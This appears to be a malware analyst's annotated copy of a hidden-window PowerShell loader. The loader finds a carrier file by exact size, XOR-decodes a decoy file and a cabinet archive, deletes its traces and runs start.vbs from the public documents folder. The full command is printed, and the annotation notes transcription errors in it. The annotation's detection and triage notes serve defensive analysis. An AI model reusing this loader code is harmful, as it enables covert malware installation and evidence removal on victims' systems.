# Analyst annotation (the command line below is left exactly as printed on the page).
#
# Purpose: a one-line PowerShell command, started with a hidden window, that
# carves two XOR-encoded blobs out of a carrier file found on disk, opens the
# first, unpacks the second as a cabinet archive, and runs a script from it.
#
# NOTE(review): the text looks like a transcription rather than a verbatim copy.
# "*. Ink", "$ _. length", ". length-4" and "-F :*" contain stray spaces, and
# the for-loop tests $pKLkwFlQuFs (letter l) but increments $pKLkwF1QuFs
# (digit 1), so taken literally the tested counter never advances. Presumably
# the original reads "*.lnk" and uses one counter name - confirm against the
# sample before building exact-match signatures on this string.
#
# YConxMQRHMUJ(path, offset, length, key, outPath):
#   Opens `path` read-only, seeks to `offset` from the start, reads `length`
#   bytes, XORs every byte with the single-byte `key`, and writes the result to
#   `outPath` via `sc ... -Encoding Byte` (sc is the Set-Content alias).
#
# GXpurZybPt(dir):
#   Recursively lists entries under `dir` matching the filter printed as
#   "*. Ink" whose length equals 0x171E7298 (387,871,384 bytes) and returns
#   their full paths. The carrier is located by exact size, not by name.
#
# Main sequence, in the order it appears:
#   1. Search the current location; if nothing matches, search $env:Temp.
#   2. Output path 1 = carrier path minus its last four characters.
#      ($NQkLZpaPUo is reassigned via Split-Path but not read again here.)
#   3. Blob 1: offset 0x0000208C, length 0x00011A00 (72,192 bytes), key 0x18,
#      written to output path 1 and invoked with `&`. Presumably a decoy
#      document; its content is not shown on the page.
#   4. Blob 2: offset 0x00013A8C (the byte right after blob 1), length
#      0x00013CD1 (81,105 bytes), key 0xC0, written to %PUBLIC%\lrOPZp.cab.
#   5. The carrier file is deleted with Remove-Item -Force.
#   6. `expand` extracts every file from the cab into %PUBLIC%\documents, the
#      cab is deleted, then %PUBLIC%\documents\start.vbs is invoked with `&`.
#
# Detection and triage points that follow from the visible text:
#   - PowerShell command line combining "-windowstyle hidden" with a
#     FileStream Seek/Read and a -bxor loop.
#   - expand.exe launched with a %PUBLIC% .cab source and a
#     %PUBLIC%\documents destination, followed by start.vbs running from there.
#   - The carrier and the cab are both removed, so on-disk evidence is limited
#     to the extracted files and the first decoded file; process-creation and
#     script-block logs are the more durable record.
#   - The two offset/length/key triples are enough to decode both blobs
#     offline from a preserved copy of the carrier for static analysis.
powershell -windowstyle hidden function YConxMQRHMUJ{ param($YYtkIkwDqIi, $EDLrNRoqmQy, $FYAJ1WmLWxcF, $NxdqHweRps, $BwnfzQmrXnvr); $xMqrvObDCr = New-Object System.IO.FileStream($YYtkIkwDqIi, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read); $xMqrvObDCr.Seek($EDLrNRoqmQy, [System.IO.SeekOrigin]::Begin); $yOwxApfKwb = New-Object byte[] $FYAJ1WmLWxcF; $xMqrvObDCr.Read($yOwxApfKwb,0, $FYAJ1WmLWxcF); $xMqrvObDCr.Close(); for($pKLkwFlQuFs = 0; $pKLkwFlQuFs -lt $FYAJ1WmLWxcF; $pKLkwF1QuFs++) { $yOwxApfKwb[$pKLkwFlQuFs] = $yOwxApfKwb[$pKLkwFlQuFs] -bxor $NxdqHweRps; } sc $BwnfzQmrXnvr $yOwxApfKwb -Encoding Byte; }; function GXpurZybPt{ param($YHeiNZkDCi); $sgiZbGNRsb = Get-ChildItem -Path $YHeiNZkDCi -Recurse *. Ink | where-object {$ _. length -eq 0x171E7298} | Select-Object -ExpandProperty FullName; return $sgiZbGNRsb; }; $NQkLZpaPUo = Get-Location; $JSJgpNpDKaqk = GXpurZybPt -YHeiNZkDCi $NQkLZpaPUo; if ($JSJgpNpDKaqk.length -eq 0) { $JSJgpNpDKaqk = GXpurZybPt -YHeiNZkDCi $env:Temp; } $NQkLZpaPUo = Split-Path $JSJgpNpDKaqk; $KIKFGdBFaNi = $JSJgpNpDKaqk.substring(0, $JSJgpNpDKaqk. length-4) + ''; YConxMQRHMUJ -YYtkIkwDqIi $JSJgpNpDKaqk -EDLrNRoqmQy 0x0000208C -FYAJ1WmLWxcF 0x00011A00 -NxdqHweRps 0x18 -BwnfzQmrXnvr $KIKFGdBFaNi; &$KIKFGdBFaNi; $AIjrthkuEgoY = $env:public + '\' + 'lrOPZp.cab'; YConxMQRHMUJ -YYtkIkwDqIi $JSJgpNpDKaqk -EDLrNRoqmQy 0x00013A8C -FYAJ1WmLWxcF 0x00013CD1 -NxdqHweRps 0xC0 -BwnfzQmrXnvr $AIjrthkuEgoY; Remove-Item -Path $JSJgpNpDKaqk -Force; expand $AIjrthkuEgoY -F :* ($env:public+ '\' +'documents'); remove-item -path $AIjrthkuEgoY -force; $SskykggetrL=$env:public+'\documents\start.vbs'; &$SskykggetrL;